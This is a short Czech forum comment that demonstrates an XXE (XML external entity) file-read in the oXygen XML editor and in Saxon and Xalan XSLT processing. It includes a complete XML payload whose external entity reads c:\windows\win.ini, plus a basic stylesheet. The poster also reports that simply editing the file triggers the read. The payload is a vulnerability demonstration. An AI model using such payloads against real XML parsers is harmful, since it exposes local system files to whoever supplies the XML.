KamilZ | 109.81.211.* | 1.9.2016 21:36 |
| Zkusil jsem tohle v oXygen XML editoru a XSLT transformace (Saxon, Xalan) win.ini vypíše:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "c:\windows\win.ini">]>
<foo xmlns:xsi="[link]">&xxe;</foo>
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet xmlns:xsl="[link]"
xmlns:xs="[link]"
exclude-result-prefixes="xs"
version="1.0">
<xsl:template match="/">
<xsl:apply-templates/>
</xsl:template>
</xsl:stylesheet>
a pouhá editace XML si na win.ini sáhne také, i bez transformace: [link] |
|